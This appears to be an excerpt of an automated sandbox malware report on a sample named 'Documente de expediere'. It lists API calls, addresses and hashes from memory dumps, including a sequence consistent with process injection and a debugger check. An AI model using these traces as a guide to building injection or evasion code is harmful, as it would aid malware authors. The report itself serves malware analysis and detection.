                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,006F97D2,?,?,?,?,?,00000004), ref: 006F9B45
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,006F97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 006F9B5B
                                                • CloseHandle.KERNEL32(00000000,?,006F97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F9B62
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                APIs
                                                • _free.LIBCMT ref: 006F8FA5
                                                  • Part of subcall function 006B2F95: RtlFreeHeap.NTDLL(00000000,00000000,?,006B9C64), ref: 006B2FA9
                                                  • Part of subcall function 006B2F95: GetLastError.KERNEL32(00000000,?,006B9C64), ref: 006B2FBB
                                                • _free.LIBCMT ref: 006F8FB6
                                                • _free.LIBCMT ref: 006F8FC8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 8d2e240b1ea31fcfdc4e03cef47b23766f3c2b3facfff9806c318d1924a489ce
                                                • Instruction ID: 989d12a49935f37f5f16539cc77827c83ed0d30a191599f87fef3aa499e4a241
                                                • Opcode Fuzzy Hash: 8d2e240b1ea31fcfdc4e03cef47b23766f3c2b3facfff9806c318d1924a489ce
                                                • Instruction Fuzzy Hash: 24225670508341DFDB64DF54C494BAABBE6BF85300F14895DE88A8B762DB31EC85CB86
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00694992
                                                  • Part of subcall function 006B35AC: __lock.LIBCMT ref: 006B35B2
                                                  • Part of subcall function 006B35AC: DecodePointer.KERNEL32(00000001,?,006949A7,006E81BC), ref: 006B35BE
                                                  • Part of subcall function 006B35AC: EncodePointer.KERNEL32(?,?,006949A7,006E81BC), ref: 006B35C9
                                                  • Part of subcall function 00694A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00694A73
                                                  • Part of subcall function 00694A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00694A88
                                                  • Part of subcall function 00693B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B7A
                                                  • Part of subcall function 00693B4C: IsDebuggerPresent.KERNEL32 ref: 00693B8C
                                                  • Part of subcall function 00693B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,007562F8,007562E0,?,?), ref: 00693BFD
                                                  • Part of subcall function 00693B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00693C81
                                                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 006949D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 64f9baf00aa365c4e10c05341f792a6890dcac52bbb4fdebc84d52000031f087
                                                • Instruction ID: 4fd41446b949a8a88cd8d962da951fc68af4d880ec91087d37756a62b1b3d5a5
                                                • Opcode Fuzzy Hash: 64f9baf00aa365c4e10c05341f792a6890dcac52bbb4fdebc84d52000031f087
                                                • Instruction Fuzzy Hash: 79119A719083119FCB00EF29EC0598AFBE9FB98711F00851EF045832B1DBB49A46CB9A
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00695981,?,?,?,?), ref: 00695E27
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00695981,?,?,?,?), ref: 006CE19C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: a1d3f1d58bb047e111e6a8b81a0cf7a256309d83a48d6dc04c8d09622433cc1e
                                                • Instruction ID: d1148609103dd10b7d067ad8ecc20d9a7a5c3ad64cc57cd06b83ddf8c68224cf
                                                • Opcode Fuzzy Hash: a1d3f1d58bb047e111e6a8b81a0cf7a256309d83a48d6dc04c8d09622433cc1e
                                                • Instruction Fuzzy Hash: AB01B970244708BEF7250E14CC8AFB6379DEB01768F10C319FAE65A6E0C6B55D458B54
                                                APIs
                                                  • Part of subcall function 006B594C: __FF_MSGBANNER.LIBCMT ref: 006B5963
                                                  • Part of subcall function 006B594C: __NMSG_WRITE.LIBCMT ref: 006B596A
                                                  • Part of subcall function 006B594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,006B1013,?), ref: 006B598F
                                                • std::exception::exception.LIBCMT ref: 006B102C
                                                • __CxxThrowException@8.LIBCMT ref: 006B1041
                                                  • Part of subcall function 006B87DB: RaiseException.KERNEL32(?,?,?,0074BAF8,00000000,?,?,?,?,006B1046,?,0074BAF8,?,00000001), ref: 006B8830
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: b442b225ed40598cf7f214c4004eef4fa346394b3515058ffcbcf9729539e155
                                                • Instruction ID: 1879ad228aa00b67ab5e0e584824c486931516deaec6e9557dd077c1f50455f7
                                                • Opcode Fuzzy Hash: b442b225ed40598cf7f214c4004eef4fa346394b3515058ffcbcf9729539e155
                                                • Instruction Fuzzy Hash: E4F0F4B564022DB6CB20BA58EC159DF7BAE9F01350F60002AF80497282EFB0CBC1C398
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __lock_file_memset
                                                • String ID:
                                                • API String ID: 26237723-0
                                                • Opcode ID: f32289b4035ec0d7a1d0d82b653b05b992d55f800aba7c9e516641c8b5bea9a7
                                                • Instruction ID: 6ce6fab890d0e0a930fa1b45622ed1e0938bdd60c259b7589ee03b2c4420ccba
                                                • Opcode Fuzzy Hash: f32289b4035ec0d7a1d0d82b653b05b992d55f800aba7c9e516641c8b5bea9a7
                                                • Instruction Fuzzy Hash: D901D4F1900618EBCF52BF69CC01ADE7B67AF80360F044219F8141B2A1DB31CA92DB95
                                                APIs
                                                  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
                                                • __lock_file.LIBCMT ref: 006B561B
                                                  • Part of subcall function 006B6E4E: __lock.LIBCMT ref: 006B6E71
                                                • __fclose_nolock.LIBCMT ref: 006B5626
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                • String ID:
                                                • API String ID: 2800547568-0
                                                • Opcode ID: 5157e1b1016794e706731eb1613589788680b717a1da820013e84c0a36fcfb92
                                                • Instruction ID: b25dbda1057ec606ad94e4afcc9d1cb0995e72875df290889c9321c32f36232d
                                                • Opcode Fuzzy Hash: 5157e1b1016794e706731eb1613589788680b717a1da820013e84c0a36fcfb92
                                                • Instruction Fuzzy Hash: CCF0F6F1800A009ED7606B7488027EE77971F40330F58410EA412AB1D1DF7C8982CB59
                                                APIs
                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01541A5B
                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01541AF1
                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01541B13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257873961.0000000001540000.00000040.00001000.00020000.00000000.sdmp, Offset: 01540000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1540000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                • String ID:
                                                • API String ID: 2438371351-0
                                                • Opcode ID: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                • Instruction ID: 7e4bc0219fb81e80c3b05720f2bc293bcdf54783454043179d5ef5093577b9ef
                                                • Opcode Fuzzy Hash: aa5ac5a3be62539e190cb66ef3a7ce968b32dbbeab3f01f3ced4961a16edbae6
                                                • Instruction Fuzzy Hash: C312DD24E24658C6EB24DF64D8507DEB232FF68300F1090E9910DEB7A5E77A5F81CB5A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fef862958d56dcda15e21af454d0ed7e3520f8b5a347c7f89dbde6cb71e3b0b5
                                                • Instruction ID: 3218de22aee613637822810d83db278769b46c97644397a04b84758632613464
                                                • Opcode Fuzzy Hash: fef862958d56dcda15e21af454d0ed7e3520f8b5a347c7f89dbde6cb71e3b0b5
                                                • Instruction Fuzzy Hash: 8A517235A00605AFCF55FB58C9A1EAE77ABAF45310F14806DF946AB392CB30ED01CB59
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00695CF6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: dbefc36b0a0b0d6ecd1e03630cef9697ca959fa27e9a9268fdbdec70e045cabe
                                                • Instruction ID: e3e1a0eabc377d7b38b8c680246c0e7ec490cdaa68eea477676399ac7cd8739c
                                                • Opcode Fuzzy Hash: dbefc36b0a0b0d6ecd1e03630cef9697ca959fa27e9a9268fdbdec70e045cabe
                                                • Instruction Fuzzy Hash: 3A315E31A00B09EBCF19CF6DC484AADB7BAFF44320F148619D81A93B10D731B964DB94
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 601a79e406a0f47132ed2140ebf0a702d20f30dd8017dc9099babf5cdd1d8b76
                                                • Instruction ID: 03de59358ede6e26815afa4903c670a849d1c9ddd09dfcae9ac428943c1f983d
                                                • Opcode Fuzzy Hash: 601a79e406a0f47132ed2140ebf0a702d20f30dd8017dc9099babf5cdd1d8b76
                                                • Instruction Fuzzy Hash: 56415974908341DFDB24DF54C484B5ABBE2BF45308F1988ACE8894B762C732EC85CB96
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: b6478b6a298dbb7958d02558fde4cfee31eae22e6c53a3d0d763c5a514352fbb
                                                • Instruction ID: ec90cb11b2c104f5c2bde5cd365151a7994836bfa1621cd467737a6f85ba30cc
                                                • Opcode Fuzzy Hash: b6478b6a298dbb7958d02558fde4cfee31eae22e6c53a3d0d763c5a514352fbb
                                                • Instruction Fuzzy Hash: 6221C371A00A08EBDF105F51E885B7A7FBAFF11350F21C46EE486C5514EB7194E0879A
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _wcscmp
                                                • String ID:
                                                • API String ID: 856254489-0
                                                • Opcode ID: 2cc91d098237a6fbd75e30cbb712927e243c1defd93e19f258691d5d355ab95d
                                                • Instruction ID: de281bc1709a5f04864fc9f48f753fa6ea49461d599e5587bbae7ebf53a84879
                                                • Opcode Fuzzy Hash: 2cc91d098237a6fbd75e30cbb712927e243c1defd93e19f258691d5d355ab95d
                                                • Instruction Fuzzy Hash: 24119372E04119EBCF14EBA9DC819EEB77EEF51360F10411AE811AB690DB309E05CB94
                                                APIs
                                                  • Part of subcall function 00694D13: FreeLibrary.KERNEL32(00000000,?), ref: 00694D4D
                                                  • Part of subcall function 006B548B: __wfsopen.LIBCMT ref: 006B5496
                                                • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694F6F
                                                  • Part of subcall function 00694CC8: FreeLibrary.KERNEL32(00000000), ref: 00694D02
                                                  • Part of subcall function 00694DD0: _memmove.LIBCMT ref: 00694E1A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Library$Free$Load__wfsopen_memmove
                                                • String ID:
                                                • API String ID: 1396898556-0
                                                • Opcode ID: b2181da951c6474a0abaccab9866e6ba163791321767497961d36f24eff9dcdb
                                                • Instruction ID: 4f4d3b94fea9b01c0734d7c10996d98471d6ca8acc80cdd35c4ac06a1ec0d2c6
                                                • Opcode Fuzzy Hash: b2181da951c6474a0abaccab9866e6ba163791321767497961d36f24eff9dcdb
                                                • Instruction Fuzzy Hash: 6211E73160070AAACF54AF74CC02FAE77AE9F84711F10852DF542A66C1EE759A069BA4
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                 • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 9b814c98ff2e88b6ad8008151832501498fd36f9305a349448a801dfbf53537d
                                                • Instruction ID: 258bd9216835c32f623674adbbc988fafefd64d9e37d0721a1108253866eeaef
                                                • Opcode Fuzzy Hash: 9b814c98ff2e88b6ad8008151832501498fd36f9305a349448a801dfbf53537d
                                                • Instruction Fuzzy Hash: F92155B4908341DFCB24DF54C444B5ABBE6BF89304F04896CE88A4BB61C731F885DB96
APIs
• ReadFile.KERNELBASE(?,?,00010000,?,00000000,00000000,?,00010000,?,00695807,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00695D76
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 4107c2ad2a60745f31dd64a1c36e6372b9460145c1e9b2418fde4ec2ffde96e0
• Instruction ID: 9d0ca982717623ac1996f1466c672e7eef514423f9f525f3e8579c3b665404e8
• Opcode Fuzzy Hash: 4107c2ad2a60745f31dd64a1c36e6372b9460145c1e9b2418fde4ec2ffde96e0
• Instruction Fuzzy Hash: 76113A31200B059FDB328F15D884BA2B7EAEF45760F10C92EE4AB86A50D770E949CB64
APIs
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
• Instruction ID: e729a9c44e962411e24fb52c1bb738f80983c8e9837c0939c892d0a0a53cb10e
• Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
• Instruction Fuzzy Hash: D10184B9600541AFC705EB69C451D66FBAAFF96350314815DF819C7B02DB31EC21CBE4
APIs
• __lock_file.LIBCMT ref: 006B4AD6
  • Part of subcall function 006B8D68: __getptd_noexit.LIBCMT ref: 006B8D68
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
Similarity
• API ID: __getptd_noexit__lock_file
• String ID:
• API String ID: 2597487223-0
• Opcode ID: 67d6ef83ed616a88a6aed935c7a831e38fab6f96dc3a03383af96b1d5a86fa7c
• Instruction ID: a41d2cdf1aeacf835e877493a6cadfd04b03919c923d8a5f2c36f60e61cde31e
• Opcode Fuzzy Hash: 67d6ef83ed616a88a6aed935c7a831e38fab6f96dc3a03383af96b1d5a86fa7c
• Instruction Fuzzy Hash: E5F081B19402099BDFA1AF74CC067DE3666AF00325F044518B4149B1D2DF788A91DB59
APIs
• FreeLibrary.KERNEL32(?,?,007562F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00694FDE
Memory Dump Source
• Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
• Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
